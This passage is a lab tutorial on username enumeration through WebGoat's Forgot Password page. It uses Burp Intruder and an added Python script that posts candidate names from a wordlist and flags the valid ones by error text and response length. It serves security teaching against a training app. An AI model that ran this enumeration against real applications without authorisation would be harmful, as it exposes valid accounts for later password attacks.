Almost all applications offer users a way to recover or reset a forgotten password. It is not uncommon for the same functionality to reveal when a username does not exist (a different error message, response length or status code for unknown names), and an attacker can use that difference to enumerate valid accounts. The following steps demonstrate it against WebGoat using Burp Suite's Intruder:
- From Kali Linux, browse to WebGoat (http://192.168.56.11/WebGoat/attack), and, if a login dialog pops up, use webgoat as both the username and password.
- Once in WebGoat, go to Authentication Flaws | Forgot Password. If we submit a random username that does not exist in the database, we receive a message saying that the username is not valid.
- We can then assume that the response will be different when a valid username is provided. To test this, locate the request in Burp's Proxy | HTTP history; it should be a POST to http://192.168.56.11/WebGoat/attack?Screen=64&menu=500. Send it to Intruder.
- Once in Intruder, clear the automatically selected positions and leave the username parameter as the only payload position.
- Then, go to Payloads to set the list of users we will use in the attack. Leave the payload type as Simple list and click the Load button to load the /usr/share/wordlists/metasploit/http_default_users.txt file.
- Now that we know the message when a user doesn't exist, we can use Burp to tell us when that message appears in the results. Go to Options | Grep - Match and clear the list.
- Add the string Not a valid username as a new match expression; Intruder will add a column to the results table and tick it for every response that contains that string.
- Now, start the attack. Notice that for some names, such as admin, the invalid-username match is not ticked; those are the usernames that exist in the application. It is worth sorting the results by the Length column as well: a valid username typically produces a response of a different size (WebGoat moves on to the secret-question step), so the length confirms the grep result and would also catch a case where the error text is present but the page is otherwise different.
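The same attack can be scripted instead of run through Intruder, which is useful once you know the two response shapes and want to run a larger wordlist. The script below is an added example and is not from the original text or from WebGoat; it replays the procedure above (POST each candidate to the Forgot Password endpoint, grep for the invalid-username message, record the response length as a second signal). The form field name Username and the SUBMIT parameter are assumptions about the WebGoat 5 lesson, the webgoat/webgoat credentials are sent as HTTP Basic auth, and fake_webgoat is a constructed stand-in for the lesson so the example can be exercised offline.

```python
import base64
import urllib.parse
import urllib.request

# Target and marker string taken from the procedure above.
WEBGOAT_URL = "http://192.168.56.11/WebGoat/attack?Screen=64&menu=500"
INVALID_MARKER = "Not a valid username"          # the Grep - Match string
FIELD_NAME = "Username"                          # assumption: lesson's form field name
WORDLIST = "/usr/share/wordlists/metasploit/http_default_users.txt"


def http_send(username, url=WEBGOAT_URL, auth=("webgoat", "webgoat")):
    """Submit the Forgot Password form for one username and return the body.

    The login dialog mentioned in the procedure is HTTP Basic auth, so the
    credentials go in an Authorization header on every request.
    """
    body = urllib.parse.urlencode({FIELD_NAME: username, "SUBMIT": "Submit"}).encode()
    req = urllib.request.Request(url, data=body, method="POST")
    token = base64.b64encode(f"{auth[0]}:{auth[1]}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def classify(body, marker=INVALID_MARKER):
    """True when the response lacks the invalid-username message, i.e. the
    name is accepted by the application (the unticked rows in Intruder)."""
    return marker not in body


def enumerate_users(candidates, send=http_send, marker=INVALID_MARKER):
    """Replay the Intruder attack over a list of candidate usernames.

    Returns the names judged valid and a dict of response lengths, the same
    two columns (Grep - Match and Length) used to spot hits in the results table.
    """
    found = []
    lengths = {}
    for name in candidates:
        body = send(name)
        lengths[name] = len(body)
        if classify(body, marker):
            found.append(name)
    return found, lengths


def load_wordlist(path=WORDLIST):
    """Read a wordlist, skipping blank lines and comments."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return [ln.strip() for ln in fh if ln.strip() and not ln.startswith("#")]


def fake_webgoat(username):
    """Constructed stand-in for the lesson, used only so this runs offline.

    It mimics the two outcomes observed in the procedure: the error for an
    unknown name and the secret-question prompt for a known one. 'admin' is
    the name the text reports as valid; 'jeff' and 'dave' are assumed extra
    accounts added for illustration.
    """
    known = {"admin", "jeff", "dave"}
    if username in known:
        return f"<p>Welcome {username}. Please answer your secret question: what is your favorite color?</p>"
    return "<p>Not a valid username</p>"


if __name__ == "__main__":
    # Offline demonstration over a constructed candidate list. Against a real
    # WebGoat instance use: enumerate_users(load_wordlist(), send=http_send)
    candidates = ["root", "admin", "test", "guest", "jeff"]
    valid, sizes = enumerate_users(candidates, send=fake_webgoat)
    for name in candidates:
        flag = "VALID" if name in valid else "-"
        print(f"{name:<8} len={sizes[name]:<4} {flag}")
```

The length column matters in practice: if an application ever returns the error string inside a page that also differs in other ways, or strips the message but changes the page size, comparing lengths (or a stricter diff of the bodies) keeps the enumeration honest. Against a real target, also expect lockout or rate limiting to shape how fast you can run the list.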